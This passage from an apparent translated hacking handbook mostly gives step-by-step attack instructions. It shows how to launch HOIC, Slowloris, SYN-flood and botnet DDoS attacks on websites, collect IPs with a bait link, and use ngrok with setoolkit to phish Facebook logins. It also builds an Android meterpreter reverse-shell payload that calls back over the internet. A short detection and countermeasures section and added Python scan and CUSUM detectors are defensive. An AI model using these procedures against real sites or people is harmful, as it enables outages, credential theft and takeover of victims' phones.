After that, the txt file we created is on the Desktop, so it can be opened with any program you like, as in the picture above. cat opens it right in the command line. The others are GUI programs.
Scanning in Metasploit

We can also use nmap inside msf. Everyone already knows Nmap, so I will not describe it specially. It was also covered in the Scanning chapter.

As in the picture above, search portscan can be used to find the port scans. I will demonstrate the module on the fifth line in the picture above. To use it, it is simply use. It is easy. If you do not know what to do next, you can call help or show options as usual.

When you call show options, look at the entries that are blank in the Current column. You can see that INTERFACE and RHOSTS are blank. Configure those first, with set.

I am using a wifi connection, so I entered wlan0 for INTERFACE. With a cable, you would enter eth0. For RHOSTS you can see that not a single IP but a whole range was entered, with /24. Before running it, let's adjust a little more. Call show options again.

As shown above, the current column is now complete. But PORTS is set to port 1 through 10000. That many will take a long time. If I only want port 80, that has to be changed. Another thing is that THREADS is only one. I will enter about 50. So that needs to be set as well.

Note that INTERFACE, PORTS, RHOSTS and THREADS are all in capital letters. Type them exactly, with nothing extra and nothing missing. Now let's run it. The result will differ depending on the conditions in the network being scanned.

Other scans can be carried out in the same way.
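The settings chosen above (a single port, 80, across a whole /24) produce a horizontal sweep: one port on many hosts, rather than many ports on one host. The Python below is an added example, not code from the book, showing how a defender's connection log reveals both shapes and why a detector that only counts ports per host misses the sweep. The connection records, addresses, thresholds and function names are constructed assumptions.

```python
from collections import defaultdict


def detect_scans(records, window=60, port_threshold=100, host_threshold=20):
    """Classify sources as vertical and/or horizontal scanners.

    records: iterable of (epoch_seconds, src_ip, dst_ip, dst_port).
    Events are grouped into fixed time buckets of `window` seconds, so a
    scan that straddles a bucket boundary is counted in two halves.
    """
    ports_on_host = defaultdict(set)   # (src, bucket, dst)  -> ports tried
    hosts_on_port = defaultdict(set)   # (src, bucket, port) -> hosts tried
    for ts, src, dst, port in records:
        bucket = int(ts) // window
        ports_on_host[(src, bucket, dst)].add(port)
        hosts_on_port[(src, bucket, port)].add(dst)

    alerts = defaultdict(set)
    for (src, _bucket, _dst), ports in ports_on_host.items():
        if len(ports) >= port_threshold:
            alerts[src].add("vertical")      # many ports, one host
    for (src, _bucket, _port), hosts in hosts_on_port.items():
        if len(hosts) >= host_threshold:
            alerts[src].add("horizontal")    # one port, many hosts
    return {src: sorted(kinds) for src, kinds in alerts.items()}


def sample_records():
    """Constructed connection records for three sources."""
    recs = []
    # Source .50: port 80 on every host of a /24 within about five seconds.
    for i in range(1, 255):
        recs.append((1000 + i * 0.02, "192.0.2.50", "192.0.2.%d" % i, 80))
    # Source .77: ports 1-1000 on a single host within about ten seconds.
    for port in range(1, 1001):
        recs.append((1000 + port * 0.01, "192.0.2.77", "192.0.2.10", port))
    # Source .20: an ordinary client making a few connections.
    recs += [
        (1001, "192.0.2.20", "192.0.2.10", 443),
        (1002, "192.0.2.20", "192.0.2.10", 80),
        (1030, "192.0.2.20", "192.0.2.11", 443),
    ]
    return recs


if __name__ == "__main__":
    print(detect_scans(sample_records()))
    # With the host-count rule effectively disabled, the port-80 sweep
    # goes unnoticed even though it touched 254 machines.
    print(detect_scans(sample_records(), host_threshold=10**6))
```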

Finding Vulnerable MSSQL systems in Metasploit

With search mssql you can find the modules that can be used in msf. I used auxiliary/scanner/mssql/mssql_ping.

When show options is displayed as usual, you will see that RHOSTS is blank. Where the required column says yes, it means the value must be filled in. PASSWORD is blank in the same way, but because its required column says no, it can be left as it is unless a user & password are actually needed.

I set RHOSTS and ran exploit.

A sniffer can also be used from msf.

Exploits for snmp can also be searched for and used inside msf.

If you want to know the database commands, display help database in msf and use the commands under the command column. Detailed descriptions of each of them can be read at www.offensive-security.com/metasploit-unleashed. In the Facebook Group I will also be providing many pdf files worth reading as Group Files. Because the page count does not allow a complete account of Metasploit, only the starting points for further study have been given here. More about metasploit will also appear in the Port Forwarding chapter.
CHAPTER 25: DoS & DDoS Attacks

Introduction

Everyone has heard of DoS and DDoS. Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) are the most commonly seen type of attack and happen every day. Most experts do not place DoS and DDoS attacks under the heading of hacking. That is because DoS attacks, whose main purpose is to cause a system breakdown, can be carried out without any skill. But because they are still attacks, some say they belong within hacking. Either way, let's study them.

Denial-of-service is a kind of attack that targets the capacity of IT resources. Resources here means servers, computers, network devices, software/applications, websites and so on. The aim of the attack is to prevent legitimate (normal) users from gaining access, for a short or a long period. In a DoS attack, the attackers flood the target with illegitimate or unsolicited (crafted, abnormal) requests or with heavy traffic.

Doing this overloads the target's resources so that it can no longer provide service to normal users. By sending more requests than the computer can handle, those requests use up all of the computer's CPU and memory resources, so that no resources at all are left for legitimate users, the normal, authorised users.
To make this concrete, here is an example. Suppose there is a fried-chicken shop that delivers to your home when you order by phone. Suppose the shop has two landlines for taking orders. Now suppose a malicious person, with the help of some device, keeps one of the phones connected all the time so that the line is never free. In a shop with two landlines, while one phone is unusable, the customers who used to be spread over two phones all have to call the single remaining one, so the shop's service becomes congested and it can only sell part of what it used to. From the customers' side, a call that used to get through on the first or second attempt now takes three or four attempts during the attack. When customers have to call more than three or four times, they move their order to some other shop that is easier to reach, so the shop loses its customers too.

Suppose the shop notices the situation, inspects the blocked landline and understands what is going on. It will then have to try installing caller ID machines, find out which numbers are harassing it, and blacklist those numbers. But this is not a long-term answer. It only solves the problem for a while, because the attacker can switch to other numbers. For the long term, a long-term strategy has to be drawn up and followed.
Denial-of-Service works in the same way. It degrades or stops the IT devices and services of the target company. This can be done from a single machine belonging to the attacker, or by combining other machines that the attacker controls. A DoS attack carried out from many machines against a single target is called a Distributed Denial-of-Service (DDoS) attack.

Botnets
This word is probably familiar as well. A botnet, a name formed by joining and shortening the words Robot and Network, is really just a malicious program. These are programs created so that cybercriminals, the people who commit cyber crime, can control and use them for malicious activity. Put most simply, they are programs that recruit the soldiers who will take part in an attack.

The frightening part is that this recruitment happens without the system owners' knowledge. In other words, the systems are used without their owners knowing. Programs controlled in this way (compromised programs) are called zombies, and botnets are also called clusters. When attackers want to commit some cyber crime, they prefer to use such exploited devices rather than their own machines. Botnets can also be used for good purposes such as web spidering and search engine indexing.

There are also many cases where botnets are part of an ecosystem, including building up botnets, collecting as many zombies as possible and reselling them. This chapter discusses as much of this as it can.

Botnet Tools
Botnet tools are easy to obtain on the market. The well-known ones include Win32.Shark, Plugbot, Poison Ivy, Illusion and Netbot attacker.

Win32.Shark is a kind of backdoor Trojan horse program. It is a tool for two-way communication, firewall bypassing and remote administration, and once a system is infected it keeps pulling other malware into that system every day. It also tries to spread itself through spam email. It infects through pop-up advertisements and inserts malicious code into the system registry. It tries to disable security software and helps the attacker gain control of the whole system.

Poison Ivy is a kind of Remote Access Trojan (RAT) and is also an advanced remote administration tool for Windows computers. With this tool an attacker can steal important data such as passwords and banking information. Although the discussion so far may suggest it, bots cannot be assumed to be software only. A PlugBot can also be a very small computer about the size of a power adapter, and it can be used as a penetration testing device as well.
DoS & DDoS Tools
In a DDoS attack, controlled machines that have been infected with malicious code are used to carry out DoS attacks together against one target system. Well-known tools for carrying out such DDoS attacks are LOIC (Low Orbit Ion Cannon), HOIC (High Orbit Ion Cannon), Anonymous-DoS, Tor's Hammer, DDOSIM, DAVOSET, PyLoris, Moihack Port-Flooder, XOIC and OWASP DoS HTTP Post.

The picture above shows what you see when HOIC is opened. If you want to try HOIC (High Orbit Ion Cannon), it can be downloaded from bit.ly/kmn-hoic. In the picture above, near the lower right, you will see a plus sign circled in red. Clicking it shows the following.

As in the picture above, HOIC's target has to be entered. The target URL has to be entered starting with http:// or https://, for example http://www.target.com (or) https://www.target.com.

As shown above, just as the target website URL is entered under URL, Power can be set as high as High. Booster can also be selected. After clicking add, the URL we targeted appears in the target area. To add more, click the plus sign again, and to remove an entry, select it and remove it with the minus sign. When everything is ready, clicking FIRE TEH LAZER! starts the DoS attack.

In the Output area you will see the sizes changing, and when the attack succeeds the target site becomes slower and slower until it cannot be opened at all.

This is what is displayed while we are attacking. Because High was selected for Power, the effect can go as far as a complete stop (if no protection is in place, that is).

When the operation succeeds, the site becomes unreachable as in the picture above and cannot be opened. If the attack is stopped the site can come back, and if it stays under attack like this for a long time it can eventually reach a system breakdown.

DoS Attack with Pentmenu in Kali


This time let us work from our Kali Linux. pentmenu can be obtained as follows.
git clone https://github.com/GinjaChris/pentmenu.git
Just type the line above into the Terminal. The download is small, so it arrives in a moment.

Then I used the cd command to enter pentmenu, as in the picture above. Listing with ls shows the file pentmenu displayed in green, which makes it easy to tell that it is a program to be run.

Because it is going to be run, it needs executable permission. I granted the permission with chmod +x.

To run it, ./ is used. That is dot slash.

Its menu appears as shown above. I am going to demonstrate DoS, so I chose Options 2. The menu that comes up next is interesting. It has 12 methods plus one entry for going back. You will see ICMP Echo Flood, ICMP Blacknurse, TCP SYN/ACK/RST/XMAS Flood, UDP Flood, SSL DoS, Slowloris, IPsec DoS, Distraction Scan and DNS NXDOMAIN Flood.

I scanned my target from another terminal. Then, for DoS, I chose Slowloris.

What I chose is option 9.

This is the step where my target has to be entered. I went to the target website and copied the URL. Then I entered it in the target field, and at the step that asks for the port I wanted to keep the default, so I pressed enter with 80.

For the number of data bytes the default is 3000. I ended up entering a 1 followed by as many as seven zeros. (sorry)

At this step I just chose r for random.

As shown above, it asks whether to use SSL/TLS. I entered n.

Now you can see that the Slowloris attack process is ongoing.

My target site went down before long. What I want to point out here is that not every site will go down with this little effort. I will discuss that later. For now, since I was only doing this to be able to write about it, I pressed Control + c in the terminal and stopped it.

SYN Flooding in Metasploit

This time I will demonstrate with Metasploit, so I entered msf with the commands above.

Since the DoS is going to be performed from msf this time, I ran use on synflood under auxiliary/dos/tcp.

I set RHOST to the IP address and called show options.
Fields that show Yes in the Required column must not be left blank. If one is blank, use set to fill it in. In the picture I have shown, all the mandatory fields marked yes in the required column are filled in.

Exploit has been run. SYN flooding is starting. The more attacker machines carry out these actions, the greater the effect.

Other dos auxiliaries in Metasploit that work in a similar way can also be found with search, as shown above.

DoS with DAVOSET in Kali Linux

As shown above, DAVOSET can also be obtained and used to carry out a DoS attack.

Then, after entering the DAVOSET folder with cd and listing it, you will see the file davoset.pl. It is written in the Perl language, so it has to be opened with Perl.

It is a portable application that needs no installation. As soon as it is opened it goes straight to the prompt where the site has to be entered, as shown above.

Its strength is that it connects to the zombie servers collected in it and performs a DDoS attack. It is easy to use and also effective. The thing to be careful about is that http & https must not be included when sites are entered. The site has to be entered directly, for example www.example.com.

DDoS Botnet Attack with Hammer

Get the required hammer with git clone as shown above.

Use cd to enter the hammer folder. Listing it then shows hammer.py.

It is written in python3, so open it with python3 hammer.py. You will see -h = help, -s = server ip, -p = port and -t = turbo default 135.

Open another Terminal and ping the target site. Only the IP address is needed, so as soon as the IP is shown you can stop with Control + C. Copy the IP address.

In the terminal where hammer was opened earlier, type the command as shown above to carry out the DDoS. Because it attacks using the bots collected on the server, it is more effective.

Once you see nothing but server maybe down, the original site has reached the point where its users can no longer use it.

This picture is from the time the BBC website was under DDoS attack.

Besides what I have described, a DoS attack can also be carried out from the DoS attack entry under ettercap >> unified sniffing >> plugin >> manage plugins, which is already included in Kali Linux.

I will not go into those any further. Let us now move on to something that should be more interesting for us: creating our own bots, that is, creating our own botnets and carrying out a DDoS attack.
Creating Own Botnets on Any Device
The method described now is about creating your own botnets, which are very good and effective for carrying out DDoS attacks. It is a method that works whether you do it from a computer (Windows, Mac & Linux) or from a phone. It also suits people who want to raise bots commercially.

First, go to grabify.link from a browser.

Then you have to Register to open an account. Registering is very easy.

After signing up, an email will arrive in your mail inbox. Once the account is confirmed, the first step is done. The second step is to create the bait that will be used. For that you need to find a link that most people will be interested in. I kept it simple: I went to YouTube and copied the Link (URL) of a video. Then go back to grabify.link in the Browser. In the field marked Enter a valid URL in the picture, I entered the video link I had just copied. Then I clicked Create URL.

In the picture above you will see the Link Information for the link we created. The link shown at New URL (Send them this link) is the one to copy. It can then be shared from somewhere, described as a film that has not even reached the cinemas yet.

I have only just created it, so you will see Results : 0. As more people click the created link, the results increase. The Hide Bots option seen in the picture can also be turned on. The IP addresses of the people who click the link can be copied as well.
DoS Attack Detection
In practice, detecting a DoS attack is not easy. The techniques for detecting a DoS attack depend on expected traffic patterns. When usage goes beyond the normal level and the expected traffic pattern, it is marked as an abnormal condition. You have to keep in mind that a DoS attack can arrive at any time, and preparations need to be made in advance for that. You need to be able to tell that a DoS attack is arriving before the whole service degrades. There are three main detection techniques: Activity Profiling, Sequential Change-point detection and wavelet analysis. These are also countermeasures that need to be prepared in advance.

Countermeasures
A countermeasure can be roughly understood as the things that are arranged and prepared in advance so that, when some threat arrives, it can be noticed and responded to. It could be called a defence plan, but its meaning is broader than that. The three detection techniques mentioned above are discussed again here.
Activity profiling is based on network traffic. It identifies an attack by the increase in activity level among clusters. In a DDoS event, activity increases noticeably in all of the distinct clusters. Activity profiling can be carried out by monitoring the header information of network packets.

If we wanted to analyse the individual flows of every possible UDP service, we would need to monitor about 264 flow orders, because protocols such as SNMP, TCP and ICMP are involved as well. Adding up all the consecutive flows in a cluster gives the activity level of that cluster.

The second method is the sequential change-point detection technique. Its algorithms can pick out the abrupt changes in traffic that an attack causes. This detection technique first filters the target traffic data by port, by address and by protocol. It then stores the resulting flows as time series. Those time series are treated as the time domain that represents the cluster activities, and they can show the changes over time that appear when a DoS flooding attack begins. A change-point detection algorithm such as CUSUM, which works well on data recorded sequentially in this way, can point out DoS attacks based on the changes that occur.
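An added example (not from the book): the activity-profiling and change-point steps described above, sketched in Python. The flow records are constructed sample data, and the function names, the 30-sample baseline and the CUSUM parameters k and h are assumptions chosen for illustration.

```python
"""Activity profiling plus one-sided CUSUM over per-cluster packet counts.
All flow records below are constructed sample data, not captured traffic."""
from collections import defaultdict
from statistics import mean, pstdev


def build_sample_flows(seconds=60, onset=40):
    """Constructed records: (second, protocol, dst_port, packets)."""
    flows = []
    for t in range(seconds):
        flows.append((t, "tcp", 443, 90 + (t * 7) % 21))  # 90/97/104 pkts per second
        flows.append((t, "udp", 53, 18 + (t * 3) % 5))    # 18..22 pkts per second
        if t >= onset:
            # Constructed flood that ramps up slowly instead of jumping.
            flows.append((t, "tcp", 443, 15 * (t - onset + 1)))
    return flows


def activity_levels(flows, interval=1):
    """Activity profiling: a cluster is (protocol, dst_port); its activity
    level per time bucket is the sum of the packets of all its flows."""
    levels = defaultdict(lambda: defaultdict(int))
    for ts, proto, port, packets in flows:
        levels[(proto, port)][ts // interval] += packets
    return levels


def cusum_alarm(series, baseline_len=30, k=0.5, h=5.0):
    """One-sided CUSUM for an upward shift.

    The first baseline_len samples define normal traffic (mean, std dev).
    After that, S_t = max(0, S_{t-1} + z_t - k) with z_t the standardised
    sample; k is the slack that absorbs normal jitter and h the alarm
    threshold. Returns the index of the first alarm, or None.
    """
    base = series[:baseline_len]
    mu = mean(base)
    sigma = pstdev(base) or 1.0   # flat baseline: avoid division by zero
    s = 0.0
    for i in range(baseline_len, len(series)):
        s = max(0.0, s + (series[i] - mu) / sigma - k)
        if s > h:
            return i
    return None


def detect(flows, n_buckets, interval=1):
    """Run CUSUM on every cluster's time series; return {cluster: alarm_bucket}."""
    alarms = {}
    for cluster, buckets in activity_levels(flows, interval).items():
        series = [buckets.get(i, 0) for i in range(n_buckets)]
        hit = cusum_alarm(series)
        if hit is not None:
            alarms[cluster] = hit
    return alarms


if __name__ == "__main__":
    for cluster, bucket in detect(build_sample_flows(), 60).items():
        print(f"change point in {cluster} at t={bucket}s")
```

In the sample data the ramp begins at second 40 and the alarm is raised one second later, while the unaffected udp/53 cluster stays quiet: the accumulated sum catches a slow rise that a single sample would not yet show.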
The third detection technique is wavelet analysis. Input signals are described as spectral components in wavelets. Because wavelets can give a concurrent description of time and frequency, a decision can be made from the time gap at a given frequency. This is because DoS and DDoS are techniques that send at a very high frequency within a short moment, so they will be far above the highest frequency-to-time ratio that can occur during normal use.
There are four ways to defend against botnets. The first is to use RFC 3704 filtering to filter out traffic from unused IP addresses. The second is black hole filtering, which drops the traffic arriving at network nodes without informing the sources. The last is to use CISCO IPS Source IP reputation filtering. This last method is also useful for defending against DDoS.
Another point is that we should know the tools that can defend against DDoS. Although they are called tools, they come as both software & hardware. They are DDoS Protector, FortiDDoS appliances, Arbor Pravail Availability Protection System, Cisco Guard XT, Wanguard, SDL Regex Fuzzer, NetFlow Analyzer, Netscaler application firewall and Anti-DDoS Guardian.
We have to try to find and fix the weaknesses (vulnerabilities) in our network. This is where the role of Penetration Testing becomes important. If we have not searched our networks for weaknesses and fixed them, we may find attackers breaking into our networks, or carrying out DDoS attacks that disrupt our operations. A few of the steps that should be taken are described below.
1. To test stability and performance, check behaviour under heavy load by placing an artificial load on the application or server. Tools such as Webserver Stress Tool, Web Stress Tester and JMeter can be used for this.
2. Scan our networks and look for weaknesses. Powerful scanners such as Nmap, GFI LANGuard and Nessus can be used for this.
3. Try running a SYN attack against our own server by sending connection request packets continuously. DoS HTTP, Sprut and PHDoS can be used to run it.
4. Port Flooding attacks, which send large numbers of TCP and UDP packets continuously, should also be tried. For this kind of testing Mutilate can be used for TCP ports and Pepsi5 for UDP ports.
5. If email servers are in place, they can be tested by running email bombers, using Mail Bomber or the Advanced Mail Bomber tool.
6. Try to flood guest books and website forms by filling them with fake data, known as bogus entries, and with arbitrary, very long entries.
7. Record everything that is found and report it to the people responsible for each area, then negotiate the fixes and test again.
The 7 steps above are things that Penetration Testers should carry out. Once these points have been investigated carefully and the gaps have been fixed, our systems are reasonably secure. The advanced work that follows is to have a defence plan in place (a defence play), to prepare a Layered DDoS strategy, to protect DNS servers and other critical infrastructure, and to put DDoS protection in place.
CHAPTER 26: Port Forwarding for WAN attacks

Introduction

Earlier in the book we tried out Metasploit and Setoolkit. When used that way they only work inside the Same Network, and we find they have no effect on people who are online through their own phones. An attack that only works inside the Same Network is called a LAN attack, because it can only be used within the Local Area Network. So to carry out these attacks we would have to follow the target around and sit waiting until we were inside the Same Network.

In reality that is not easy. Our Target may well be in another country. So our attacks have to be raised from the LAN level to the Wide Area Network level (WAN attack). In that situation the many methods in this Chapter can be used. Let us call it the art of Port Forwarding. I have collected the ways in which this art can be used and present them hands-on with sample attacks.

Port Forwarding for Kali (Method 1)


As the first method, I would like to present a good app that is the easiest to use. Type bit.ly/ngrok-kmn into the Browser and press Enter to get the ngrok file, which is about 16MB.

When the download has finished, open the Terminal and enter the Downloads directory with the cd command, as shown above.

Once you are in the Downloads directory, use the mv command to move the ngrok file into usr/bin/ on the system, as in the picture above.

As in the picture above, use cd /usr/bin to go on into the directory the file was moved to. We have now reached the place from which ngrok can be used. But the ngrok we downloaded is an executable program, so it still needs executable permission (+x).

We have now reached the stage where it can be run. Close the open Terminals and open a new Terminal.

In the new Terminal, just type ngrok and press enter to see a description of ngrok and examples of how to use it. This tells us that ngrok can now be called from anywhere in the Terminal. Now let us try it out.

This picture shows two Terminals opened side by side. ngrok http 80 and ngrok http 4444 have been forwarded. Suppose we want to open tcp port 1234. Then we just type ngrok tcp 1234 and press enter. That should be enough to understand it. Let us try it hands-on.

I opened only ngrok http 80. Let us see what comes up.

It looks like the picture above. At Session status you will see online in green. At Web Interface you will see http://127.0.0.1:4040. On any computer this refers to localhost, so 127.0.0.1 will be the same. Below Localhost there are two Forwarding entries, http and https. To test it, I will demonstrate with setoolkit.

ngrok must not be closed. Open one more new terminal and type setoolkit. (This was discussed earlier in the book.)

I am going to use Social Engineering attack, so I chose 1.

I am going to use Website Attack Vectors, so I chose 2.

I will use Credential Harvester Attack. That is 3.

If we want to use Facebook or Gmail, they are already included in 1) Web Templates. If you want the logins of other sites you have to choose manual. I have shown the manual choice.

The next step is the one everybody already knows: the place where the IP address is entered. What we have to keep in mind is that this is not a Same Network attack but a WAN attack. For a WAN attack, the localhost IP has to be used in the IP field.

In the IP address field, 127.0.0.1 has to be entered together with the port that was forwarded earlier. I forwarded with ngrok http 80, so I combined it with http 80 and entered 127.0.0.1:80. That is, Localhost IP:Port.

This step is also already familiar. Both http & https are supported, so I entered https://web.facebook.com. For other sites, the login url can be copied in here in the same way.

It shows in yellow that the site is being cloned, and the notes are shown in red. When the blue lines appear, what we have created is ready.

It shows that our attack is ready and running on port 80, and that the results can be followed below.

Let us go back to the Terminal where ngrok http 80 was started at the beginning. In the picture above you will see two Forwarding links. Of those I selected the https: one as shown in the picture, right clicked and copied it. That Link is the one that has to be sent to our Target.

If our Target clicks the Link we sent, they arrive at the Facebook Login Page as shown above. (Getting them to click and log in is, of course, a matter of Social Engineering.)

When our Victim clicks the Link, the HTTP Requests show up in the Terminal where ngrok is open, as shown above. The more clicks, the more requests.

The mail & password that are entered can also be seen in the Terminal where setoolkit is open. All of this has been discussed before, so I assume this is enough to understand it.

Port Forwarding for Kali (Method 2)


This is a way of using the same ngrok that we discussed first, on a permanent basis.

First, go to ngrok.com from the Browser. Click Sign up For free and open an Account. Signing up is easy and Google Sign In is also offered, so I expect opening an Account will go smoothly. After the Account is opened, a Confirm Link is sent to your Mail. As soon as you click the Confirm Link you can log in to the Account. After logging in you arrive at dashboard.ngrok.com/get-started.

As shown above you will see Connect your account, and below it, copy the command in the small black box. Then open the Terminal and go to the place where ngrok is.

Then the command we just copied can be entered there.

When the copied code is entered and Enter is pressed, the Authtoken (Authentication Token) is saved and the connection to the Account is complete. ngrok can be called from anywhere in the Terminal. Its advantage is that it is more Stable when used with an Account connected. So those who do not want to open an Account with their own Email can use a fresh account.

Android Hacking Over WAN (Example)


This time I will demonstrate using msfvenom from Fatrat.

Calling fatrat opens FatRat. How to obtain and install FatRat was covered in the earlier chapters.

There is something I said in advance at the start: that I would use msfvenom. Look for msfvenom in the Menu. In this picture it is at 1, so I typed 1 and pressed Enter.

In the second menu you will see 14 choices (one of them is Back). The heading I have given this section is Android, so I chose 3. That is, type 3 and Enter.

The LHOST IP address (or) Hostname has to be set.

You can probably tell what this is as soon as you see the picture. Open one more Terminal and use ngrok. This time the one I want to open is tcp port 12345, so as shown in the picture, type ngrok tcp 12345 and Enter.

Wait until ngrok goes online as shown above. Then copy the part of the Forwarding entry up to tcp://..........io.

Enter the copied value at LHOST.

Copy the number that follows .io (it will not necessarily match the one in the picture) and enter it at LPORT. My digits were 16042, so I will enter 16042.

The name of the output file has to be given.

I simply named it kmn.

For the Payload I chose android/meterpreter/reverse_tcp. That is 3. You will remember that a tcp port was opened in ngrok as well.

msfvenom is now creating the payloads. The remaining parts are the same as described in the Android Hacking part, so I will not show them again.

I will also keep posting plenty of further study material in the Facebook Group.

I will keep on doing my best.

The author
